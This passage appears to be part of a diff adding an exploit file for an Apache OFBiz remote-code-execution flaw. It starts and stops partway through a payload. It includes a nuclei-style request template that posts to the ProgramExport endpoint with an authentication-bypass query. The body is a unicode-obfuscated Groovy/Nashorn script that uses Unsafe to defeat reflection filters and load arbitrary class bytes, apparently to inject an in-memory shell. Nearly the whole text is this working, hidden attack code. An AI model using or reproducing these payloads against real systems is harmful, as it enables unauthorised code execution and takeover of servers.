0042\u0078\u0041\u0051\u006f\u0041\u0064\u0041\u0045\u0049\u0041\u0048\u0055\u0042\u0044\u0041\u0042\u0035\u0041\u0051\u0034\u0041\u0066\u0077\u0045\u0050\u0041\u0049\u0038\u0042\u0045\u0041\u0043\u006d\u0041\u0052\u004d\u0041\u0071\u0051\u0045\u0052\u0041\u004b\u006f\u0042\u0046\u0051\u0041\u0042\u0041\u004b\u0055\u0041\u0041\u0041\u0041\u0043\u0041\u004b\u0059\u003d\u005c\u0022\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0022\u0029\u003b
+```
+
+## yaml
+```
+
+id: Apache-OFBiz-ProgramExport-rce
+
+info:
+  name: Apache-OFBiz-ProgramExport-rce
+  author: yingyu
+  severity: high
+
+
+
+http:
+  - raw:
+      - |
+        POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 89852
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Cmd: echo {{randstr}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept-Encoding: gzip
+        Connection: close
+
+        groovyProgram=\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u0078\u002e\u0073\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0063\u0072\u0069\u0070\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u004d\u0061\u006e\u0061\u0067\u0065\u0072\u0028\u0029\u002e\u0067\u0065\u0074\u0045\u006e\u0067\u0069\u006e\u0065\u0042\u0079\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0073\u0022\u0029\u002e\u0065\u0076\u0061\u006c\u0028\u0022\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u006c\u006f\u0061\u0064\u0028\u005c\u0022\u006e\u0061\u0073\u0068\u006f\u0072\u006e\u003a\u006d\u006f\u007a\u0069\u006c\u006c\u0061\u005f\u0063\u006f\u006d\u0070\u0061\u0074\u002e\u006a\u0073\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0029\u0020\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0068\u0065\u0055\u006e\u0073\u0061\u0066\u0065\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0067\u0065\u0074\u0028\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u0063\u006c\u0061\u007a\u007a\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0043\u006c\u0061\u0073\u0073\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0064\u006b\u002e\u0069\u006e\u0074\u0065\u0072\u006e\u0061\u006c\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u002c\u0020\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u0042\u006f\u006f\u006c\u0065\u0061\u006e\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u002c\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0079\u0074\u0065\u0073\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\